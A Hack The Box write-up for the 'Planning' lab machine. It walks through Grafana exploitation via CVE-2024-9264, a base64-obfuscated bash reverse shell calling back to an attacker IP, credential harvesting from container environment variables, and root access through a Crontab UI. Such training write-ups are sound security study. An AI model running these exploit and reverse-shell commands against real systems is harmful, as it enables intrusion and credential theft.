HTB Writeup - Planning

# Step 1: IP Enumeration

Scan finds a website on the machine. Only HTTP and SSH no other services.

# Step 2: Website Enumeration

Website’s a dead end. Run ffuf for directories:

$ ffuf -u http://planning.htb/FUZZ -w ./wordlists/dirbuster/directory-list-2.3-medium.txt -c -t 50

No hits. Sub-directory scan reveals Grafana at http://grafana.planning.htb. Login with admin/0D5oT70Fq13EvB5r. Find CVE-2024-9264: Grafana SQL Expressions RCE.

# Step 3: CVE-2024-9264 Reverse Shell

Test the exploit:

python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c whoami http://grafana.planning.htb

Confirms RCE. Set up Netcat listener on 10.10.14.7:5555, then run:

python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjcvNTU1NSAwPiYx | base64 -d | bash" http://grafana.planning.htb

Land in a Docker environment. Check env variables:

root@7ce659d667d7:~# env | grep GF_SECURITY
GF_SECURITY_ADMIN_USER=enzo
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!

New credentials: enzo/RioTecRANDEntANT!.

# Step 4: SSH to User

SSH as enzo with RioTecRANDEntANT!. Grab the user flag.

# Step 5: Privilege Escalation

Upload LinPEAS. Find /opt/crontabs/crontab.db with credentials root/P4ssw0rd (not root user). LinPEAS lists 127.0.0.1:8000. Forward the port:

ssh -L 8000:localhost:8000 enzo@planning.htb

# Step 6: Crontab UI (Root Flag)

Port reveals a Crontab UI with root privileges. Login with crontab.db credentials. Add cronjob:

cp /root/root.txt /tmp/flag

Click Run Now. Root flag secured.